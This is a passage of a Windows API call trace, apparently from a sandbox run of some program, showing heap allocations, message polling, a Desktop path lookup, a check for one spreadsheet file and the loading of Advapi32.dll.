lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0190.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0190.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0190.180] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0190.180] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0190.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0190.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0190.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9288 [0190.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0190.180] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0190.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0190.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0190.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0190.181] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0190.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0190.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0190.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b88 [0190.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0190.181] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0190.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0190.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0190.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0190.181] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0190.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0190.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0190.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0190.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0190.181] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0190.181] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.182] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0190.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0190.182] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0190.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0190.182] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0190.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0190.182] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0190.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0190.182] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/YItI7wiYOV-Y.xlsx", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3e13340, ftCreationTime.dwHighDateTime=0x1d4c8a2, ftLastAccessTime.dwLowDateTime=0xb89c1c00, ftLastAccessTime.dwHighDateTime=0x1d4ce49, ftLastWriteTime.dwLowDateTime=0xb89c1c00, ftLastWriteTime.dwHighDateTime=0x1d4ce49, nFileSizeHigh=0x0, nFileSizeLow=0x5d75, dwReserved0=0xc170006, dwReserved1=0xff83, cFileName="YItI7wiYOV-Y.xlsx", cAlternateFileName="YITI7W~1.XLS")) returned 0xaa5860 [0190.182] FindClose (in: hFindFile=0xaa5860 | out: hFindFile=0xaa5860) returned 1 [0190.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0190.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0190.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0190.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0190.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0190.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0190.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0190.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0190.184] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0190.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0190.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0190.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0190.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0190.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0190.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0190.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0190.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0190.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0190.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0190.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0190.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0190.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0190.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0190.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0190.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0190.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0190.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0190.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0190.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0190.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0190.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0190.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0190.185] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0190.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0190.186] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0190.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0190.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0190.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95d0 [0190.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0190.186] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0190.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0190.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0190.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0190.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0190.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0190.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0190.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0190.186] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0190.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0190.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0190.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0190.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0190.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0190.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0190.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0190.187] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0190.187] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0190.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0190.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0190.187] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0190.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0190.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0190.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa9b0 [0190.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0190.187] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0190.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0190.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0190.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0190.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0190.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0190.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0190.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0190.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0190.188] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0190.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0190.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0190.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0190.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0190.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0190.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0190.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0190.188] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0190.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0190.188] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0190.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0190.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0190.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0190.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0190.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0190.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0190.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0190.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0190.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0190.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0190.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0190.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0190.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0190.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0190.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0190.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0190.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0190.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0190.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0190.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0190.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0190.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0190.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0190.190] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0190.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0190.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0190.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0190.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0190.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0190.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0190.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0190.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0190.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0190.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0190.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0190.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0190.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0190.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0190.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0190.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0190.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0190.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0190.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.191] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0190.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0190.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0190.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0190.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0190.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0190.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0190.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0190.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0190.192] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0190.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0190.192] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0190.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0190.192] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0190.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0190.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0190.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0190.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2058 [0190.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0190.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0190.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0190.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa830 [0190.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0190.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0190.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0190.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0190.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 